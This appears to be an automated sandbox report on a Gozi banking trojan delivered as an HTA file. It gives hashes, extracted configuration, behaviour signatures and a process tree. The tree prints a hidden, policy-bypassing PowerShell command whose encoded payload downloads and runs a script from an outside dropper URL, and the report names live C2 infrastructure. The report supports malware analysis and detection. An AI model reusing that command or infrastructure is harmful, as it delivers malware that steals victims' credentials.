gozi | 818c482b0d6be6f5c9449c76d79edf4e038fe639267b2da83675e0c5b723cea7

General

Target

client_1.hta
Size

22KB
MD5

57d3eb665f1e9e6a19f278baabd49e7b
SHA1

44566a9d716e6abd0304544dd88d245fea990882
SHA256

4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d
SHA512

30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d
SSDEEP

384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1048 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

sWgCOE.exe

pid process

2824 sWgCOE.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exe

pid process

1048 powershell.exe
1048 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1048 powershell.exe
1048 powershell.exe
1048 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1048 powershell.exe

flow	pid	process
5	1048	powershell.exe

pid	process
2824	sWgCOE.exe

pid	process
1048	powershell.exe
1048	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1048	powershell.exe
1048	powershell.exe
1048	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1048	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

mshta.execmd.exepowershell.exe

description	pid	process	target process
PID 2444 wrote to memory of 2224	2444	mshta.exe	cmd.exe
PID 2444 wrote to memory of 2224	2444	mshta.exe	cmd.exe
PID 2444 wrote to memory of 2224	2444	mshta.exe	cmd.exe
PID 2444 wrote to memory of 2224	2444	mshta.exe	cmd.exe
PID 2224 wrote to memory of 1048	2224	cmd.exe	powershell.exe
PID 2224 wrote to memory of 1048	2224	cmd.exe	powershell.exe
PID 2224 wrote to memory of 1048	2224	cmd.exe	powershell.exe
PID 2224 wrote to memory of 1048	2224	cmd.exe	powershell.exe
PID 1048 wrote to memory of 2824	1048	powershell.exe	sWgCOE.exe
PID 1048 wrote to memory of 2824	1048	powershell.exe	sWgCOE.exe
PID 1048 wrote to memory of 2824	1048	powershell.exe	sWgCOE.exe
PID 1048 wrote to memory of 2824	1048	powershell.exe	sWgCOE.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_1.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:2224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048

C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe
"C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe"
4⤵
- Executes dropped EXE
PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe
Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe
Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
\Users\Admin\AppData\Local\Temp\sWgCOE.exe
Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
\Users\Admin\AppData\Local\Temp\sWgCOE.exe
Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
memory/1048-16-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1048-11-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1048-14-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/1048-13-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/1048-12-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1048-25-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/2824-27-0x0000000002460000-0x0000000002560000-memory.dmp

Filesize
1024KB

Download
memory/2824-28-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2824-29-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2824-30-0x00000000002D0000-0x00000000002DD000-memory.dmp

Filesize
52KB

Download
memory/2824-33-0x0000000002460000-0x0000000002560000-memory.dmp

Filesize
1024KB

Download
memory/2824-34-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads